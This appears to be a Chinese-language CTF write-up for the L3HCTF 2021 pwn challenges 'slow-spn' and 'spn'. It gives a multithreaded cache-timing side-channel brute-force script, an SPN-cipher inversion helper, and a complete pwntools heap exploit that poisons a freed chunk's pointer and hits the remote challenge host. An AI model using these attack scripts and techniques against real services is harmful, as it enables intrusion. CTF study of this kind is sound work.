[L3HCTF 2021] Pwn方向writeup - spn & slow-spn
slow-spn
本题里面cacheLine是一个缓存单元的类型,__maccess()
函数负责检查cacheLine
是否命中,以及置换掉最少命中次数的cacheLine
思路:侧信道泄露+爆破
struct cacheLine
{
uint32_t tag;
uint32_t last_used;
};
key = flag[0:6]
plain = flag[6:10]
k>>n*4
↓
plaintext -> |SS| -> |P| -> XOR -> ... -> |SS| -> |P| -> cipher
... --> |SS| --(vuln)--> |&cache| --> |P| --> ...
getflag的脚本
from pwn import *
from hashlib import sha256
from pwnlib.util.iters import mbruteforce
context.log_level = 'debug'
def pow(p):
p.recvuntil(b"hashlib.sha256( x + \"")
c = p.recvuntil("\"" , drop = True)
print(c)
proof = mbruteforce(lambda x: sha256(x.encode() + c).hexdigest()[:6] == '000000'
, '0123456789', length=8, method='fixed')
p.sendline(proof)
def getflag(key , m):
p.recvuntil(b'Input possible spn key (hex):')
p.sendline(key)
p.recvuntil(b'Input possible spn plaintext (hex):')
p.sendline(m)
res = p.recv()
if res == b'Wrong.':
return 0
else:
print(res)
p = remote('124.71.173.176' ,8888)
pow(p)
getflag('11' , '1111')
脚本比较乱就贴个爆第一轮的上来好了,后面差不多:
#exp_round1.py
from pwn import *
import sys
from chall import ss_box, p_box, ss_box_addr, p_box_addr
from time import time, sleep
import threading
ss_map = defaultdict(list)
p_map = defaultdict(list)
stop_flag = False
#context.log_level = "debug"
class MyThread(threading.Thread):
def __init__(self, func, args=()):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result
except Exception as e:
return None
def get_args(self, _idx=None):
return self.args if _idx == None else self.args[_idx]
class MyPipe:
def __init__(self, _addr, _typ="local"):
if _typ == "local":
self.raw_p = process(_addr)
else:
self.raw_p = remote(_addr[0], _addr[1])
def maccess(self, addr, speed):
print(f"Addr: {addr}")
print(f"Fetch cache: {hex((addr>>5) & 0x1F)}\nCache tag: {hex(addr>>10)}")
self.raw_p.sendlineafter(b"What to do?\n", b"1")
self.raw_p.sendlineafter(b"Where?\n", str(addr).encode())
self.raw_p.sendlineafter(b"Speed up?\n", str(speed).encode())
def conti(self):
self.raw_p.sendlineafter(b"What to do?\n", b"2")
def leave(self):
self.raw_p.sendlineafter(b"What to do?\n", b"3")
def skip(self):
self.raw_p.sendlineafter(b"What to do?\n", b"4")
def recv(self, num=2048):
return self.raw_p.recv(num)
def recvall(self):
return self.raw_p.recvall()
def close(self):
self.raw_p.close()
def calc_cacheline(addr:int):
return (addr>>5) & 0x1F
def calc_tag(addr:int):
return (addr>>10)
def map_i(addr):
return (calc_cacheline(addr), calc_tag(addr))
def gen_target(cache_pos, tag):
return (tag << 10) + (cache_pos << 5)
def ss_box_item(addr):
return ss_box[(addr-ss_box_addr)//4]
def p_box_item(addr):
return p_box[(addr-p_box_addr)//4]
def ss_item_addr(value):
return ss_box_addr+ss_box.index(value)*4
def p_item_addr(value):
return p_box_addr+p_box.index(value)*4
def init():
global ss_map
global p_map
for ss_item_addr in range(ss_box_addr, ss_box_addr+len(ss_box)*4, 4):
ss_map[map_i(ss_item_addr)].append(ss_box_item(ss_item_addr))
print(f"ss_map size: {hex(len(ss_map))}")
for p_item_addr in range(p_box_addr, p_box_addr+len(p_box)*4, 4):
p_map[map_i(p_item_addr)].append(p_box_item(p_item_addr))
print(f"p_map size: {hex(len(p_map))}")
s1_list = []
p1_list = []
s1_matched = []
def burp_round_1():
MAX_THREAD = 0x100
global stop_flag
stop_flag = False
def check_si_fetch(p:MyPipe, cache_info):
global stop_flag
if stop_flag:
p.close()
return False
p.maccess(ss_item_addr(ss_map[cache_info][0]), 1) # speed up
p.conti()
t1 = time()
p.recv(1)
t2 = time()
#print(t2-t1)
p.close()
if t2-t1 >= 0.95:
return False
else:
stop_flag = True
return True
pool = []
init_active = threading.active_count()
for cache_info in ss_map.keys():
if stop_flag:
break
th = MyThread(func=check_si_fetch, args=(MyPipe(("124.71.173.176", 9999), "remote"), cache_info))
th.setDaemon(True)
while True:
if threading.active_count()-init_active > MAX_THREAD:
sleep(0.8)
else:
th.start()
pool.append(th)
#print(th.get_args(1))
break
for th in pool:
th.join()
if th.get_result() == True:
s1_cache_info = th.get_args(1)
s1_list = ss_map[s1_cache_info]
break
print(f"s1_cache_info: {s1_cache_info}")
print(f"s1_list: {s1_list}")
for s1 in s1_list:
p = MyPipe(("124.71.173.176", 9999), "remote")
p.skip()
p.maccess(p_item_addr(p_box[s1]), 1) # speed up
p.conti()
t1 = time()
p.recv(1)
t2 = time()
if(t2-t1 >= 0.96):
print("Miss")
p.close()
else:
p1_cache_info = map_i(p_item_addr(p_box[s1]))
print(f"Got p1 cache info: {p1_cache_info}")
p1_list.append(p_box[s1])
s1_matched.append(s1)
p.close()
print(f"p1_list: {p1_list}")
print(f"s1_matched: {s1_matched}")
def exp():
init()
burp_round_1()
if __name__ == "__main__":
exp()
第四组不用爆完,本地调试的时候线程开多点爆完验证一下就好
[remote]
round 1:
p1_list: [24177, 24160, 24176, 20336]
s1_matched: [20075, 20072, 20074, 20070]
round 2:
p2_list: [29651, 29634]
s2_matched: [10975, 10972]
round 3:
p3_list: [51619, 55459, 51635]
s3_matched: [59445, 59449, 59447]
然后根据上面的信息拿mlist和klist:
p1_list = [24177, 24160, 24176, 20336]
s1_matched = [20075, 20072, 20074, 20070]
p2_list = [29651, 29634]
s2_matched = [10975, 10972]
p3_list = [51619, 55459, 51635]
s3_matched = [59445, 59449, 59447]
mlist = [hex(ss_box.index(i))[2:].rjust(4 , '0') for i in s1_matched]
k2list = []
k1list = []
for s in s2_matched:
for p in p1_list:
temp = ss_box.index(s)
a = p ^ temp
k1list.append(a)
for s in s3_matched:
for p in p2_list:
temp = ss_box.index(s)
a = p ^ temp
k2list.append(a)
klist = []
for k1 in k1list:
for k2 in k2list:
temp1 = k1 &0xfff
temp2 = k2 >> 4
if temp1 == temp2:
klist.append((k1 <<4)+(k2&0xf))
print(mlist)
spn
sbox = [0xE, 4, 0xD, 1, 2, 0xF, 0xB, 8, 3, 0xA, 6, 0xC, 5, 9 , 0 , 7]
pbox = [1, 5, 9, 0xD, 2, 6, 0xA, 0xE, 3, 7, 0xB, 0xF, 4, 8,0xC, 0x10]
masks = [0x8000, 0x4000, 0x2000, 0x1000, 0x800, 0x400, 0x200, 0x100,0x80, 0x40, 0x20, 0x10, 8, 4, 2, 1]
key = [0x3a94,0xa94d ,0x94d6,0x4d63,0xd63f]
def re_s(c):
res = 0
for i in range(4):
temp = c % 16
res += sbox.index(temp)*2**(4*i)
c //= 16
return res
def re_p(c):
res = 0
for i in range(16):
if c &(0x8000>>i) != 0:
res |=(0x8000 >> (pbox[i] - 1))
return res
def dec(m):
m = (m[1]<<8) | m[0]
m ^= key[-1]
for i in range(3):
m = re_s(m)
m ^= key[-(i+2)]
m = re_p(m)
m = re_s(m)
m ^= key[0]
m = bytes([m&0xff , m >> 8])
return m
def decrypt(m):
c = b''
assert len(m) % 2 == 0
for i in range(len(m) // 2):
c += dec(m[i*2:i*2+2])
return c
print(decrypt(b'4N4N4N4N'))
过spn的脚本,调用decrypt(想要在内存写的东西),然后把返回值扔过去就行了。
密文长度必须是2的倍数,如果不是2的倍数远程会默认后面是\x00或者是其他的奇奇怪怪的东西,为了避免错误建议用2的倍数
鉴于decrypt出来的值不太稳定改成两次edit,第一次收集下变化的部分放进nonaddlist第二次正常打
from pwn import *
#p = process("./SPN_ENC", env = {"LD_PRELOAD": "./libc-2.27.so"})
#p = process("./SPN_ENC")
p = remote("124.71.194.126", 9999)
context.log_level = "debug"
sbox = [0xE, 4, 0xD, 1, 2, 0xF, 0xB, 8, 3, 0xA, 6, 0xC, 5, 9 , 0 , 7]
pbox = [1, 5, 9, 0xD, 2, 6, 0xA, 0xE, 3, 7, 0xB, 0xF, 4, 8,0xC, 0x10]
masks = [0x8000, 0x4000, 0x2000, 0x1000, 0x800, 0x400, 0x200, 0x100,0x80, 0x40, 0x20, 0x10, 8, 4, 2, 1]
key = [0x3a94,0xa94d ,0x94d6,0x4d63,0xd63f]
nonaddlist = []
def re_s(c):
res = 0
for i in range(4):
temp = c % 16
res += sbox.index(temp)*2**(4*i)
c //= 16
return res
def re_p(c):
res = 0
for i in range(16):
if c &(0x8000>>i) != 0:
res |=(0x8000 >> (pbox[i] - 1))
return res
def dec(m):
addnum = 0
if m in nonaddlist:
addnum = 1
m = (m[1]<<8) | m[0]
m ^= key[-1]
for i in range(3):
m = re_s(m)
m ^= key[-(i+2)]
m = re_p(m)
m = re_s(m)
m ^= key[0]
m = bytes([m&0xff , (m >> 8)+addnum])
return m
def decrypt(m):
c = b''
assert len(m) % 2 == 0
for i in range(len(m) // 2):
c += dec(m[i*2:i*2+2])
return c
def malloc(size, idx):
p.sendlineafter(b"0.exit\n", b"1")
p.sendlineafter(b"Size:\n", str(size).encode())
p.sendlineafter(b"Index:\n", str(idx).encode())
def edit(index, size, content):
p.sendlineafter(b"0.exit\n", b"2")
p.sendlineafter(b"Index:\n", str(index).encode())
p.sendlineafter(b"Size\n", str(size).encode())
p.sendafter(b"Content\n", content)
def free(idx):
p.sendlineafter(b"0.exit\n", b"3")
p.sendlineafter(b"Index:\n", str(idx).encode())
def show(idx):
p.sendlineafter(b"0.exit\n", b"4")
p.sendlineafter(b"Index:\n", str(idx).encode())
#: 0x555555554000
def exp():
p.recvuntil(b"gift:")
gift = int(p.recvuntil(b"\n", drop=True).decode(), 16)
elf_base = gift - 0x2040E0
print("gift:", hex(gift))
print("elf_base:", hex(elf_base))
# malloc
malloc(0x40, 0)
for i in range(3):
malloc(0x20, i+1)
free(3)
free(2)
free(1)
payload = b"A"*0x40+p64(0)+p64(0x31)+p64(gift)
payload_dec = decrypt(payload)
print("Payload len:", hex(len(payload)))
print(payload.hex())
print(payload_dec.hex())
w_size = 0x58
edit(0, w_size, payload_dec)
for i in range(0, w_size*2, 4):
p.recvuntil(b"w:")
tar = payload_dec.hex()[i+2:i+4]+payload_dec.hex()[i:i+2]
act = p.recvuntil(b"\n", drop=True).decode().rjust(4, "0")
print(tar, act)
if tar != act:
nonaddlist.append(bytes([payload[i//2]])+bytes([payload[i//2+1]]))
print(nonaddlist)
edit(0, w_size, decrypt(payload))
# fetch
malloc(0x20, 5)
malloc(0x20, 6)
edit(6, 8, b"A"*8)
print("gift:", hex(gift))
p.sendline(b"5")
p.interactive()
if __name__ == "__main__":
exp()